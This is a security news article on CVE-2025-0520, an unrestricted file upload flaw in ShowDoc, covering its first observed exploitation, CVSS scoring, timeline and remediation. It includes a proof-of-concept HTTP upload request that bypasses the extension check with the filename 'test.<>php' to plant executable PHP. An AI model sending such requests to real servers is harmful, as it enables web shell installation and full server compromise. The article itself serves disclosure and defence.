ShowDoc File Upload RCE (CVE-2025-0520) Sees First In-the-Wild Exploitation After 5 Years
Contents
VulnCheck’s Canaries (a honeypot-based service for detecting real-world exploitation) confirmed the first in-the-wild exploitation of CVE-2025-0520 against ShowDoc on April 11, 2026.
The attack exploits a missing file extension validation to plant a web shell (a malicious script that allows arbitrary OS command execution over HTTP), marking the first real-world attack approximately five years after the vulnerability was originally discovered.
What Is ShowDoc?
ShowDoc is a Chinese-origin open-source document management and sharing tool used for creating and publishing API specifications and project documentation.
With over 20,000 GitHub stars, it is primarily adopted by Chinese IT companies and development teams.
It is written in PHP and can also be installed via Composer.
Over 2,000 instances are estimated to be publicly accessible on the internet, the vast majority located in China.
Technical Details
| Field | Value |
|---|---|
| CVE Identifier | CVE-2025-0520 (also known as CNVD-2020-26585) |
| CVSS v4.0 Score | 9.4 (Critical) |
| CVSS v4.0 Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L |
| CWE | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| Affected Versions | ShowDoc before 2.8.7 |
The root cause lies in the uploadImg method of the PageController class.
This endpoint is exposed as the image upload function for the Markdown editor, but due to improper file extension validation, it accepts uploads of any file type including PHP files.
Attack Flow
flowchart TD
A[Attacker] -->|POST request| B["/index.php?s=/home/page/uploadImg"]
B -->|Bypass extension check| C["filename='test.<>php'"]
C -->|Server accepts| D[PHP file saved to web root]
D -->|GET request| E[Arbitrary PHP code execution]
E --> F[Web shell established]
F --> G[Full server compromise]The attacker bypasses the server-side extension check by injecting angle brackets into the filename, such as test.<>php.
Since the uploaded PHP file is placed in a web-accessible directory, it can be executed simply by requesting its URL.
PoC Request Example
The CNVD-2020-26585 demo environment published by VulHub (an educational repository of vulnerable environments) demonstrates the attack with the following request.
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: target:8080
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?=phpinfo();?>
------Boundary--In actual attacks, a web shell is uploaded to enable full control of the server.
The “PR:L” Discrepancy
The CVSS v4.0 score assigned by NVD rates the vulnerability as PR:L (Privileges Required: Low), but VulnCheck’s report and the GitHub advisory describe it as “unauthenticated.”
Depending on the ShowDoc version and configuration, the uploadImg endpoint can be accessible without authentication, and the observed attack against the honeypot also appears to have been unauthenticated.
While this creates some ambiguity in CVSS interpretation, the realistic assessment is that exploitation difficulty is close to “no authentication required.”
Timeline from Discovery to Exploitation
| Date | Event |
|---|---|
| May 2020 | CNVD (China National Vulnerability Database) registers the issue as CNVD-2020-26585 |
| October 2020 | Patch released in ShowDoc 2.8.7 |
| April 29, 2025 | Formally assigned as CVE-2025-0520 (delayed assignment from CNVD to CVE) |
| April 11, 2026 | VulnCheck Canaries confirms first in-the-wild exploitation at a US-based honeypot |
| April 14, 2026 | The Hacker News reports on the exploitation |
There is an approximately five-year lag between vulnerability discovery and CVE assignment.
This reflects the still-incomplete information sharing between CNVD (China’s vulnerability database) and the CVE system.
The asymmetry between CNVD and CVE is covered in detail in SentinelOne’s LABScon analysis.
Current Exposure
ShowDoc 3.8.1 is the latest version, but a significant number of the 2,000+ internet-facing instances remain unpatched.
While the attack observed by Canaries targeted a US-based honeypot, ShowDoc’s primary user base is concentrated in China, and actual attack targets likely follow a similar distribution.
VulnCheck KEV (Known Exploited Vulnerabilities) has already added an entry, with Canaries-derived exploitation evidence linked to it.
Since VulnCheck integrated Canary Intelligence into KEV entries in October 2025, actual attack observations from honeypots now serve as supporting evidence for VulnCheck KEV additions.
Remediation
The patch was released in October 2020, over five years ago, so upgrading to version 2.8.7 or later (latest is 3.8.1) is the only fundamental fix for ShowDoc operators.
For instances exposed to the internet, additional measures are also necessary.
| Measure | Details |
|---|---|
| Restrict access to the upload endpoint | Block external POST requests to /index.php?s=/home/page/uploadImg via WAF or reverse proxy |
| Disable PHP execution in the upload directory | Add php_flag engine off or equivalent to the Nginx or Apache configuration |
| Check for web shell artifacts | Inspect the upload directory for any files with .php extensions |
Magento’s PolyShell (PolyShell vulnerability enabling unauthenticated RCE via Magento REST API) similarly used polyglot files to bypass file upload extension validation.
File upload functionality is a recurring attack target because its ease of implementation tends to lead to lax validation.
Reading CVSS v4.0
This CVE is scored using CVSS v4.0, which differs from the previous v3.1 in its evaluation axes. Here is a breakdown of the key metrics.
| Metric | Value | Meaning |
|---|---|---|
| AV (Attack Vector) | N (Network) | Remotely exploitable over the internet |
| AC (Attack Complexity) | L (Low) | Reproducible without special conditions |
| AT (Attack Requirements) | N (None) | No special prerequisites in the target environment |
| PR (Privileges Required) | L (Low) | No elevated privileges needed |
| UI (User Interaction) | N (None) | No victim interaction required |
| VC/VI (Confidentiality/Integrity Impact) | H/H | Full read/write access to all data on the server |
| SC/SI (Subsequent System Impact) | H/H | High risk of lateral movement into internal networks after compromise |
The high rating for subsequent system impact (SC/SI) accounts for the possibility of lateral movement into internal networks after web shell installation.
Related Articles
- CVSS 10.0 RCE in Flowise CustomMCP Node Exposes 12,000+ Instances - Another open-source tool RCE confirmed exploited by VulnCheck. A pattern where patches exist but massive numbers of instances remain exposed
- CISA Adds 4 Actively Exploited Vulnerabilities to KEV Catalog - A case where a 2008 vulnerability was added to KEV in 2026. Old CVEs being used in real attacks years later is not unique to ShowDoc